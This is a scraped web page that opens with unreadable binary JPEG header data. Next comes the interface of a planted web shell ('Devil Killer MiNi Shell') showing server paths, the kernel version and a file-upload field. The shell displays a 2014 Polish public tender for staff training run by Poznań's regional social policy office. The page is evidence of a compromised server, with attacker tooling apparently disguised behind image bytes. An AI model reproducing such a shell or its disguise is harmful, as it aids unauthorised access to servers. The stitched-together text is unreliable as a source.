JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140703/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140703/143407-N-2014.html

<p class="kh_header"><b>Poznań: Część 1: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Interdyscyplinarna współpraca pracowników pomocy społecznej 
i służb zatrudnienia - Aktywizacja osób bezrobotnych w ramach Programu Aktywizacja i Integracja
Część 2: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Stres i wypalenie zawodowe</b><br>
<b>Numer ogłoszenia: 143407 - 2014; data zamieszczenia: 03.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej w Poznaniu , ul. Nowowiejskiego 11, 61-731 Poznań, woj. wielkopolskie, tel. 61 8567-300, faks 61 8515-635.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część 1: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Interdyscyplinarna współpraca pracowników pomocy społecznej 
i służb zatrudnienia - Aktywizacja osób bezrobotnych w ramach Programu Aktywizacja i Integracja
Część 2: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Stres i wypalenie zawodowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Interdyscyplinarna współpraca pracowników pomocy społecznej i służb zatrudnienia - Aktywizacja osób bezrobotnych w ramach Programu Aktywizacja i Integracja
Cel szkolenia: 
Celem szkolenia jest wyposażenie uczestników w wiedzę teoretyczną i praktyczne umiejętności współpracy pomiędzy powiatowymi urzędami pracy i ośrodkami pomocy społecznej na rzecz osób bezrobotnych skierowanych do realizacji  Programu Aktywizacja i Integracja.
Zakres tematyczny: 
a) Założenia programu Programu Aktywizacja i Integracja (zakres, czas realizacji, grupy docelowe);
b) Podstawy prawne  i źródła finansowania Programu Aktywizacja i Integracja ;
c) 3 modele realizacji Programu Aktywizacja i Integracja 
d)Role zadania instytucji zaangażowanych w realizację Programu Aktywizacja i Integracja;
d) Porozumienie o realizacji a porozumienie o współpracy w ramach Programu Aktywizacja 
i Integracja - różnice i korzyści dla OPS i PUP;
Sposób organizacji szkolenia: 
Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 5 edycji jednodniowych, 6-godzinnych szkoleń (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 150 uczestników w podziale na grupy maksymalnie 30 osobowe wraz z zapewnieniem uczestnikom poszczególnych edycji dowozu oraz wyżywienia. Zajęcia będą prowadzone przez minimum jednego szkoleniowca.
Materiały szkoleniowe: 
Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 3 dni przed podpisaniem umowy. Materiały powinny być przekazane do akceptacji w wersji ostatecznej. Jeden komplet materiałów Wykonawca przekaże Zamawiającemu w momencie podpisania umowy.
Rekrutacja i obsługa administracyjna: 
Zamawiający w zakresie naboru kandydatów na szkolenie i tworzenia listy uczestników:
- nawiązuje kontakt z jednostkami pomocy i integracji społecznej oraz powiatowymi urzędami pracy w Wielkopolsce i na podstawie otrzymanych zgłoszeń przeprowadza kwalifikację uczestników szkolenia oraz sporządza listę uczestników szkolenia,
- informuje kandydatów, o zakwalifikowaniu się na szkolenie,
- przekazuje listę kandydatów Wykonawcy w terminie dwóch dni przed terminem rozpoczęcia każdej edycji.
Wykonawca prowadzi działania wspierające działania Zamawiającego w formie ogłoszeń oraz informacji na własnej stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostki pomocy społecznej w Wielkopolsce.
Organizacja szkolenia
Miejsce szkolenia:
Wykonawca jest zobowiązany zorganizować pięć edycji szkolenia w pięciu miastach województwa wielkopolskiego tj. w  Poznaniu, Pile, Kaliszu, Lesznie oraz Koninie. Informacja o miejscach 
i terminach poszczególnych edycji zostanie przekazana Zamawiającemu nie później niż 5 dni przed podpisaniem umowy.
Sale szkoleniowe: 
Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: 
Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
- 2 serwisy konferencyjne składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych,
- obiad dwudaniowy z napojem.
Ww. posiłki powinny być podawane w innej sali niż sala wykładowa, ale w tym samym budynku lub na terenie tego samego ośrodka lub hotelu.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1.1. do SIWZ

 Część 2: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Stres i wypalenie zawodowe.
Cel szkolenia: 
Celem szkolenia jest nabycie praktycznych umiejętności rozpoznawania objawów nadmiernego stresu, poznanie technik radzenia sobie ze stresem oraz zasad dbania o równowagę psychofizjologiczną 
w warunkach przepracowania.
Zakres tematyczny: 
Stres jako czynnik zaburzający równowagę psychofizyczną: fizjologia czasu, rytmy dobowe, kwartalne, roczne oraz ich wpływ na sprawność psychofizyczną i możliwości intelektualne człowieka, autodiagnoza własnego stanu: zmęczenie, przemęczenie, stres, wypalenie zawodowe, stresopochodne procesy psychologiczne i fizjologiczne, etapy reakcji stresowej, stres eufunkcjonalny 
i dysfunkcjonalny - poziom stresu a skuteczność funkcjonowania, stres doraźny a stres przewlekły, zarządzanie własną energią i jej regeneracja.
Rozwijanie w sobie odporności na stres: fizjologiczna odporność - dieta, kondycja fizyczna, psychologiczna odporność - zbalansowany styl życia, asertywny styl bycia.
Techniki kontroli stresu i rozładowujące napięcie: zmiany w systemie przekonań i nastawieniu do świata, zarządzanie czasem - redukcja stresu poprzez zwiększenie efektywności pracy, sztuka odpoczynku - nauka metod relaksacji, fizyczna redukcja stresu i głębokie oddychanie, kontrola napięcia mięśni, przegląd metod (np. technika relaksacji Jacobsona i trening autogenny Schultza), metody konstruktywnego reagowania na sytuacje stresowe, samo-hipnoza i autosugestia - fakty 
i mity.
Sposób organizacji szkolenia: 
Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 7 edycji trzydniowych, 21-godzinnych szkoleń (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 120 uczestników w podziale na grupy maksymalnie 
20 osobowe wraz z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia. 
Materiały szkoleniowe: 
Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 3 dni przed podpisaniem umowy. 
Rekrutacja i obsługa administracyjna: 
Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza: nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów na każdą edycję, przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji szkolenia, poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie 
o szkoleniu jednostek pomocy społecznej w Wielkopolsce.
Organizacja szkolenia
Dojazd: 
Miejscem zbiórki uczestników szkolenia jest Dworzec Letni w Poznaniu, ul. Dworcowa 1.
Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdą edycję: pierwszego dnia każdej edycji z miejsca zbiórki uczestników do miejsca, w którym realizowane będzie szkolenie oraz po zakończeniu edycji powrót na Dworzec Letni w Poznaniu. 
Zakwaterowanie: 
Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników szkolenia w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: 
Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: 
Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
pierwszego dnia - obiad dwudaniowy z napojem oraz kolację integracyjną, drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację, trzeciego dnia - śniadanie, obiad dwudaniowy z napojem, 
2 serwisy konferencyjne w każdym dniu szkolenia, 
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1.2. do SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające dla każdej z części. Przedmiotem zamówienia jest świadczenie usług zorganizowania i przeprowadzenia szkoleń. Zamówienie uzupełniające nie przekroczy więcej niż 50 % wartości zamówienia podstawowego i będzie polegać na powtórzeniu tego samego rodzaju zamówień. Szczegółowy opis przedmiotu zamówienia zawarty jest dla Części 1 w Załączniku Nr 1.1. do SIWZ, dla Części 2 w Załączniku Nr 1.2. do SIWZ</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W zakresie Części 1 Zamawiający ustala wadium w wysokości:
1 400,00 zł ( słownie: jeden tysiąc czterysta złotych 00/100)
W zakresie Części 2 Zamawiający ustala wadium w wysokości: 
3 300,00 zł ( słownie: trzy tysiące trzysta złotych 00/100) 
Wadium wnosi się pod rygorem wykluczenia z postępowania przed upływem terminu składania ofert, w jednej lub kilku z niżej wymienionych form:
- w pieniądzu, przelewem na rachunek bankowy:
BGŻ S.A. OO Poznań
Rachunek nr 60 2030 0045 1110 0000 0234 9820
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
(Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz 
z 2010 r. Nr 96, poz. 620).
Jeżeli Wykonawca wnosi wadium w formie pieniężnej, wymagana kwota powinna znajdować się na rachunku zamawiającego przed upływem terminu składania ofert.
W przypadku pojawienia się wątpliwości co do wniesienia wadium w formach niepieniężnych wskazane jest zgłosić się do Pani Justyny Sobieskiej nr tel. (61) 858-45-25, w celu uzgodnienia trybu potwierdzenia wniesienia. Przyjęcie przez Zamawiającego dokumentu nie jest jednoznaczne 
z poprawnością złożonego wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie Części 1, Części 2: w odniesieniu do warunku Wykonawca złoży oświadczenie o spełnianiu tych warunków (Załącznik Nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do ww, warunku Wykonawca wykaże, iż okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością, a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi polegające na przeprowadzeniu w zakresie Części 1: - dwóch odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, w wymiarze czasowym minimum 15 godzin każde, w zakresie pracy z trudnym klientem w instytucjach pomocy 
i integracji społecznej lub/i instytucjach rynku pracy. 
- dwóch odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, minimum jednodniowych szkoleń wraz z zapewnieniem uczestnikom zakwaterowania i wyżywienia, każde 
o wartości co najmniej 20.000,00 złotych brutto.
Wykazane szkolenia mogą spełniać oba ww. warunki.
w zakresie Części 2:
- dwóch odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, w wymiarze czasowym minimum 20 godzinne każde, w zakresie tematycznym dotyczącym rozwoju, doradztwa osobistego lub zawodowego, zarządzaniem zasobami ludzkimi lub organizacją.
- dwóch odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, minimum dwudniowych szkoleń wraz z zapewnieniem uczestnikom zakwaterowania i wyżywienia, każde 
o wartości co najmniej 55 000,00 złotych brutto.
Wykazane szkolenia mogą spełniać oba ww. warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie Części 1, Części 2: w odniesieniu do ww. warunku Wykonawca wykaże, iż dysponuje odpowiednim potencjałem technicznym tj.: stroną internetową, adresem e-mail, sprawnym faksem, sprawnym telefonem (Załącznik Nr 8 do SIWZ - wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do ww. warunku Wykonawca dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami tj.: w zakresie Części 1: - dysponuje dwuosobowym zespołem specjalistów, z których każdy posiada:
a) wyższe wykształcenie,
b) doświadczenie w prowadzeniu szkoleń z zakresu pracy z  trudnym klientem w instytucjach pomocy i integracji społecznej lub i instytucjach rynku pracy - minimum 200 godzin szkoleniowych w ciągu ostatnich 5 lat (na dzień składania ofert) lub/i ma doświadczenie w prowadzeniu szkoleń z zakresu współpracy powiatowych urzędów pracy i ośrodków pomocy społecznej - minimum 50 godzin szkoleniowych w ciągu ostatnich 5 lat (na dzień składania ofert).
- dysponuje co najmniej jedną osobą, która:
a) będzie sprawowała opiekę nad grupą w trakcie i na miejscu szkolenia,
b) pozyska i rzetelnie przygotuje dokumentację projektową.
w zakresie Części 2:
-  dysponuje trzema osobami, z których każdy posiada:
a) wykształcenie wyższe magisterskie,
b) doświadczenie szkoleniowe: przeprowadzenie minimum 200 godzin lekcyjnych z zakresu rozwoju, doradztwa osobistego lub zawodowego,
c) doświadczenie zawodowe w pracy psychoterapeutycznej: minimum 2 lata,
- dysponuje co najmniej dwoma osobami, które:
a) będą koordynować działania i obsługę w zakresie rekrutacji uczestników szkolenia, 
b) będą sprawowały opiekę nad grupą w trakcie i na miejscu szkolenia,
c) pozyskają i rzetelnie przygotują dokumentację projektową.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie Części 1, Części 2: w odniesieniu do warunku Wykonawca złoży oświadczenie o spełnianiu tych warunków (Załącznik Nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (formularz ofertowy-Załącznik Nr 2.1. do SIWZ dla Części 1, Załącznik Nr 2.2. do SIWZ dla Części 2). Pełnomocnictwo do reprezentowania Wykonawcy, w przypadku podpisania oferty przez przedstawiciela Wykonawcy (w formie oryginału lub poświadczonej notarialnie kopii). Dowody: poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. W przypadku zamówień na usługi -oświadczenie wykonawcy -jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Wykaz Doświadczenie w przeprowadzaniu szkoleń i kwalifikacje kadry szkoleniowej dla potrzeb oceny w ramach kryterium - Załącznik Nr 9.1. do SIWZ dla Części Nr 1, Załącznik Nr 9.2. do SIWZ dla Części Nr 2. Pisemne zobowiązanie innego podmiotu-podmiotów do udostępnienia osoby-osób zdolnych do wykonania zamówienia lub zasobów niezbędnych do wykonania zamówienia, którymi Wykonawca będzie dysponował, lub inny dowód potwierdzający dysponowanie ww osobami-zasobami</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
